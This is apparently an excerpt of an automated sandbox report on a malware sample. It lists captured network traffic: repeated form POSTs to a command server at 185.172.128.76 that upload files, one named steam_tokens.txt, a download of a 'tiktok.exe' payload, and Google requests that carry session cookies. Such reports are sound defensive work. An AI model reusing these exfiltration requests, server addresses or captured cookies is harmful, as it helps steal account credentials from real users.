Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAEBFHJJDAAKFIECGDBHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJDGIJJKEGIEBGCGDHCHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJDGIJJKEGIEBGCGDHCHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 44 47 49 4a 4a 4b 45 47 49 45 42 47 43 47 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 44 47 49 4a 4a 4b 45 47 49 45 42 47 43 47 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 52 45 39 44 55 31 78 49 56 45 46 48 56 6b 52 47 56 55 6c 46 58 45 68 55 51 55 64 57 52 45 5a 56 53 55 55 75 5a 47 39 6a 65 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 44 47 49 4a 4a 4b 45 47 49 45 42 47 43 47 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 53 46 52 42 52 31 5a 45 52 6c 56 4a 52 55 78 48 57 6b 5a 44 56 46 70 61 52 31 4a 54 55 55 6c 54 51 31 68 4e 54 30 74 54 51 30 46 61 52 55 70 57 51 56 42 43 55 45 70 4c 51 55 4a 4a 57 6b 74 46 52 30 5a 42 52 30 31 48 54 30 6c 56 55 45 68 51 53 6b 39 5a 53 56 64 4e 56 6b 6c 4c 56 30 4e 4f 56 55 39 58 52 45 31 48 51 30 5a 59 53 6c 46 42 54 6b 31 4e 54 31 56 4d 53 56 5a 55 55 56 46 48 56 56 70 57 56 6b 39 4d 57 6c 64 43 57 56 52 49 57 55 39 49 54 55 31 57 53 55 31 55 56 45 4a 43 51 30 46 4a 52 30 39 4f 54 6c 4a 57 52 56 56 4e 56 45 4e 55 51 30 56 4e 56 46 64 47 54 6b 52 54 55 56 42 49 52 56 42 4d 51 55 5a 61 51 55 74 5a 55 31 4a 50 57 6b 74 53 55 55 52 56 57 6b 39 56 57 6b 6c 4c 53 6b 64 4b 55 6b 6c 43 53 6b 39 45 53 45 39 56 54 45 70 49 56 31 46 43 53 55 70 54 51 55 6c 5a 54 56 68 4d 52 6b 39 54 52 6b 39 46 52 6b 74 55 55 56 42 46 52 56 64 47 56 45 5a 44 53 55 5a 54 54 45 68 59 55 31 68 5a 57 45 4a 58 56 46 42 44 56 30 31 44 52 31 42 46 56 45 39 54 56 6b 78 4f 53 31 6c 44 54 30 35 47 56 30 4e 4a 56 55 5a 46 55 55 74 50 56 31 46 4f 55 55 74 4b 55 30 6c 61 53 30 35 61 57 45 39 52 56 30 31 55 53 6b 39 48 56 30 52 43 56 55 5a 43 53 30 52 59 56 56 42 5a 57 55 6c 59 56 56 52 50 55 46 4e 50 56 6c 64 4d 56 6b 74 4a 54 30 74 47 55 46 4e 59 52 45 46 57 54 55 4a 56 57 6b 6c 5a 57 56 70 56 55 56 52 45 54 46 70 4a 54 56 4a 53 52 31 68 4d 56 45 39 46 53 6b 31 47 56 30 78 50 54 55 35 51 54 6b 78 4a 51 31 42 61 55 45 74 55 53 46 42 59 52 55 78 48 51 6c 6c 55 53 6b 78 50 53 6b 39 46 56 30 35 53 52 45 35 4e 57 46 68 53 57 55 31 42 53 6b 4a 58 51 31 52 4f 54 55 4a 53 52 55 6c 4b 52 46 5a 57 53 56 68 46 53 45 56 48 57 56 46 4c 57 6c 46 44 52 30 78 57 53 45 39 44 54 56 56 54 53 31 68 44 55 56 46 4e 56 56 4a
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKKFHIEGDHJKECAAKKEBHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEBFCFIJJKKECAKJEHDHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCAEGDHJKFHJKFIJKJEHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIJKJJKEBGHJKFIDGCAHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDBAFIECGHCBFIDGDAAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKKJJJKJKFHJJJJECBFHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHDHIEGIIIDHIDHDHJJHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEHJEGIIDAECAAKEBKFHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKFCGIJKJKFHIDHIIIEHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFCFBAAEHCFHJJKEHJKHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJECBKKECFIEBGCAKJKHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGCGHDGIEGCBFIEGCBHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBKJEGIEBFHCAAKKEBAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBFBGDBKJKECAAKKFHDHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEBFCFIJJKKECAKJEHDHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIEHJDBKJKECBFHDGHJHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEBKJDAFHJDGDHJKKEGHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFIDGIIIJDBGDGDAKKFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKKJKKECFIDGDHIJEGDHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDHDAFIDGDBGCAAFIDHHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFBGDHCBAEHIDGCGIDAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKKJJJKJKFHJJJJECBFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGIIECGHCAKECAFBFHHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBGIEGCFHCFHIDHIJECHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCAEGDHJKFHJKFIJKJEHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFBFBAEBKJKEBGCAEHCHost: 185.172.128.76Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 43 2d 2d 0d 0a Data Ascii: ------HCFBFBAEBKJKEBGCAEHCContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------HCFBFBAEBKJKEBGCAEHCContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------HCFBFBAEBKJKEBGCAEHCContent-Disposition: form-data; name="file"------HCFBFBAEBKJKEBGCAEHC--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFCFBAAEHCFHJJKEHJKHost: 185.172.128.76Content-Length: 84915Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGDGIIJJECFIDHJJKKFHost: 185.172.128.76Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 68 65 72 37 68 34 38 72 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 2d 2d 0d 0a Data Ascii: ------JEGDGIIJJECFIDHJJKKFContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------JEGDGIIJJECFIDHJJKKFContent-Disposition: form-data; name="message"her7h48r------JEGDGIIJJECFIDHJJKKF--
Source: global traffic	HTTP traffic detected: GET /tiktok.exe HTTP/1.1Host: 185.172.128.203Cache-Control: no-cache

Source: Joe Sandbox View	IP Address: 185.172.128.90 185.172.128.90
Source: Joe Sandbox View	IP Address: 185.172.128.228 185.172.128.228

Source: Joe Sandbox View

ASN Name: NADYMSS-ASRU NADYMSS-ASRU

Source: Joe Sandbox View

JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.228
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.172.128.59

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe

Code function: 0_2_0042676C __EH_prolog,WSAStartup,socket,WSACleanup,gethostbyname,htons,connect,send,send,recv,recv,recv,recv,recv,WSACleanup,closesocket,

0_2_0042676C

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 27 Apr 2024 00:03:42 GMTContent-Type: application/zipContent-Length: 3884863Last-Modified: Wed, 24 Apr 2024 05:45:46 GMTConnection: keep-aliveETag: "66289c8a-3b473f"Strict-Transport-Security: max-age=31536000Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 0b 3f 98 58 ef da 8c 80 dd c7 12 00 09 49 14 00 09 00 00 00 62 75 6e 63 68 2e 64 61 74 5c 5d 87 a2 aa 3a 16 cd af 89 8a 20 22 2a 16 10 05 54 ec 15 1b fa f7 b3 d6 4e 3c 77 66 bc ef 58 20 24 3b bb 65 b7 e4 29 a5 ac 9e af 7c 75 5d 2b bc a6 ca 55 2a 56 ea a9 7e af 81 db 9b bd d4 66 da 52 6a 65 f7 f5 b5 1d fe 1a b5 40 f5 66 f8 72 c0 df 56 0d 95 da 17 4a 2d f0 23 55 bd e7 b3 b7 bc 2a b5 de ab 3d ba 54 13 f5 45 13 35 cc 94 5a fa e3 83 aa 26 b5 9e 7a cf 95 fa f4 27 18 6b a2 8e 25 9e cb 4a 65 a9 cb 85 03 dc d4 5b 35 1e e8 cd c6 8f f7 50 c5 db 85 42 7f b5 19 40 05 ac f3 07 2e bf d4 e9 96 a8 47 eb fc 7a 5b 2a 8f 2d 42 31 e2 c3 ce d0 4a 7a 23 0c a9 ce d7 25 de bb 4a b1 fb a6 6a 06 0f d5 57 f5 a4 0e 18 af b5 00 1d 3e 36 32 eb 6a 4b 28 95 bc 0d d4 f1 a3 1a a1 9a c4 a5 02 84 45 b4 54 c9 51 7d d6 6a dd 5f 49 8b 8e 52 ee 54 45 6a a3 3e d2 f1 8b 4f c6 2a 99 3a 4a 25 6f a5 da aa 18 02 8b ec aa a6 b2 60 82 66 2b 4f a9 d6 1c 57 3e 15 87 c0 a3 dd 53 8e 49 4e 43 f5 6d ab 36 be a9 7c 77 51 bb 78 6b ba 4b fa eb fb e5 c8 6f bd 44 1d da 82 f4 13 3a ec 6e 34 01 be 0b f5 50 3e be 84 2a 4d 86 5f 7c 1b a9 8d 50 a7 52 40 9d 67 57 00 90 af 6b 98 90 58 dd c1 01 4d 62 4d d5 0b 9a 17 00 48 0d e6 07 f5 11 e0 eb 20 0c be a0 97 c5 23 6f 05 43 43 fb 21 da b5 c6 fd 31 21 52 f5 67 a2 f2 0a f8 51 63 20 22 50 0d 95 ab c2 51 87 33 a0 48 d0 42 f3 46 e7 7c 1d c6 aa 91 29 97 e0 bd ea cf c6 f8 a9 ae 13 dc f0 40 81 bf 57 f3 a8 36 9f a1 5a 03 15 37 90 39 e0 b5 ed a2 af b6 fc ea 91 64 27 60 5f bf 36 c0 7a 72 25 61 c7 c3 b6 85 1b 00 2a 1e 37 00 2c 2e 92 dd 6c 0c e4 a8 8e a3 2e 68 cb 76 9f f4 18 a0 8b e3 50 0d 4f 05 66 e1 8d 15 21 f4 fd 59 b7 f3 23 b3 b0 59 81 37 cd c2 67 d5 d8 b9 76 3d c4 f0 6b 7f a3 00 f0 4a d5 f9 d4 4e 23 5c a5 35 cc 93 d7 c1 d2 c2 a3 5d cc a7 ca f8 ad 1f b6 3c cf 56 47 55 00 7e 99 cb 9d a8 c7 2c bd d1 58 1e 6f 9b 6b 2e 80 23 8f ce 3f 76 a1 16 25 88 30 ac 2b f2 f9 8d 6d d8 28 6d c5 9e ea 61 68 be 4a 47 3e 16 00 83 fd d8 6d f7 d1 56 99 9a 0c dd f7 d3 6b 62 c0 f3 9a f3 42 ab 6a 58 a1 17 bc 56 24 70 92 a9 93 20 ce 95 c7 3f 9b 3c d8 aa f7 16 bd 5e cf 1d cc 25 4b 41 3d 30 5c be 28 ba c3 09 a6 f8 b8 51 ac 6c 3e 8c 3b 78 ad db 23 57 d5 96 40 40 1b 74 49 55 20 1d a6 f3 51 1b a0 8c 08 9a a5 16 97 14 c2 c0 d9 90 19 2f 65 c9 99 37 45 77 c4 95 f5 7d 68 dc e2 5e 4e e2 02 c5 20 89 9e 18 bb c2 8f 91 f9 de 2b 95 e6 fb 0e c8 b2 c7 0f 8d a9 62 52 7a ca ea f7 1a e3 8b 0a 81 9a 86 32 72 a5 66 1e de 84 75 27 6f bc f1 73 1c 7d 31 05 f4 b8 6a c5 7b 10 27 25 b5 c0 19 b5 85 1a b6 3f ce 81 8d 5a 03 fc 4d d5 00 d3 d4 ca ae 39 2e 7c 50 be dd 57 a3 6f a9 d6 f9 63 a0 92 d1 9b 33 c0 00 ed 15 48 5c 87 34 95 a2 42 8a c6 a3 c0 dc df df 3b 31 34 d1 a2 36 35 93 51 33 00 85 b9 f7 32 34 24 8b ec

Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgSaEMC5GMCJsbEGIjDQUM1XksqiVK7TvDJ-VWO8_5g4InGTtoS9EM--2kh8-SXh1FoYbI9aSPEi5GAatgQyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-27-00; NID=513=nlJq8NksY3fw5JjqePju25SB4Ei052Ou-_BYpqCCmn5cqs1f7XdItZC5M5e-NHwxW8MHKmNIQq2CnKFtMN_ebrB1BwDEg6kASn0UsYT9aGECdJ6CQ0wzQfDYJstMC0Kt6w1U5xw-pQAMPux27C__0M0wEogYWQpCfaKnIaXXWG4
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgSaEMC5GMCJsbEGIjAHBiCBZ-8IAykP8bXpVLKe0gHlM-R2QwNJoGYdPTBn5xWSyLCRRyfLdQ2qWbDO2CMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-27-00; NID=513=c4eeLLbbUjrdVmY_3J67bVqlRrcId_Uly38Ob6hofqA06jqIxHd5LWwDDb_r2n_PI-Nq7d4rl0LqmARVgn0EQZL3iurYGIl8JRK4ijq2lCBIDoh_Xo7ipkby0KBmt1nHFR-uf5Pr1tzPsHyswZ_A9PXlsQ1zkKv12A3Y2VM9JHs
Source: global traffic	HTTP traffic detected: GET /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 19 Mar 2024 23:10:10 GMTUser-Agent: Microsoft BITS/7.8Host: download.iolo.net
